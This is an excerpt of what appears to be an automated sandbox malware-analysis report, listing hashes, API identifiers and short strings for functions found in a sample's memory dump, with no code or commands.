                                          • Opcode ID: 4e7ae9e1e5a687adecea6651174b1a6700ddd504dd3cee20adcb90b9a4d8f56f
                                          • Instruction ID: 952ce3ba219fc9ba8788ada3189d3f7243d69def03038d1541e9a1cd8e3d1fe4
                                          • Opcode Fuzzy Hash: 4e7ae9e1e5a687adecea6651174b1a6700ddd504dd3cee20adcb90b9a4d8f56f
                                          • Instruction Fuzzy Hash: 055103B5E0031D9FEF08CF9AD845ADDBBB5BF48394F14812AE815A7251DB38A942CF50
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                          • String ID:
                                          • API String ID: 4281723722-0
                                          • Opcode ID: ba9a7db99aa07768b8fe253712140abea942d3208ccc544a892bf901a8b6121d
                                          • Instruction ID: 783ea3ac5e090dc43379315f556e6ad58c372ecd617df96c3982b7a0dd0a81c1
                                          • Opcode Fuzzy Hash: ba9a7db99aa07768b8fe253712140abea942d3208ccc544a892bf901a8b6121d
                                          • Instruction Fuzzy Hash: 9F314575E45218EFEF14DFA8D844AADBBF0BF48320F10452AE511B7290CB356941CF54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: e14b07927dae04a4aa5c12baf3fc1933e1e173f3435892b3961c8852ce8c554d
                                          • Instruction ID: 3245210bf317120a528b08e76568bae791df3a98a19fcb3ba1336414fd247ba0
                                          • Opcode Fuzzy Hash: e14b07927dae04a4aa5c12baf3fc1933e1e173f3435892b3961c8852ce8c554d
                                          • Instruction Fuzzy Hash: 8D324878D05269DFEB25CF64C8A4BD9BBB4BF08304F0080E9D559A7641EBB85A84CF91
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: 9c9cca823430715ebbc6df9844189c1528a887631faa386996d3f22703af49b0
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: EF91E8BCE0020A9FEB14DF69D8807AEB7A1FF46764F50461AEC6AE76D0DB309940C751
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0$Flst
                                          • API String ID: 0-758220159
                                          • Opcode ID: 3ec5fa89221562aded2a183d354df60228f8515bd2f6ea4f1cccd0148be83e75
                                          • Instruction ID: 4070dfbb94a2358ee6bfdbacfd2f44ae1acd184fc0f495eedb28b3798b92e80f
                                          • Opcode Fuzzy Hash: 3ec5fa89221562aded2a183d354df60228f8515bd2f6ea4f1cccd0148be83e75
                                          • Instruction Fuzzy Hash: 21519DB9E012088FEB14CF99C48475DFBF8EF44798F14802ED449DB251EB70A989CB84
                                          APIs
                                          Strings
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 328A063D
                                          • kLsE, xrefs: 328A0540
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 3446177414-2547482624
                                          • Opcode ID: 366b60cbd021ab8482b175fff460edaaa78f4b5c9ec20df0f69220fd7f7af407
                                          • Instruction ID: ce353429c1913a8e68bd615621ab35f7744076e898c986f5a12abf3401378cea
                                          • Opcode Fuzzy Hash: 366b60cbd021ab8482b175fff460edaaa78f4b5c9ec20df0f69220fd7f7af407
                                          • Instruction Fuzzy Hash: 8C51BEB95047469FD314DF68C4507A7B7E4AF85308F00483EE9EA87241EB74D545CB92
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: 0$0
                                          • API String ID: 3446177414-203156872
                                          • Opcode ID: 6fce989f38bbe22a1367ae8e8c5cd59a565b86427fd24dfc2c788d4cd07b0e55
                                          • Instruction ID: 92c4e47ac45d2e4a40f927ea4640d01f5a007fe65071762fca11da46737ba26d
                                          • Opcode Fuzzy Hash: 6fce989f38bbe22a1367ae8e8c5cd59a565b86427fd24dfc2c788d4cd07b0e55
                                          • Instruction Fuzzy Hash: 9F416DB9608705AFD300CF28C484A56BBE4BF89758F04492EF988DB741D771EA05CF96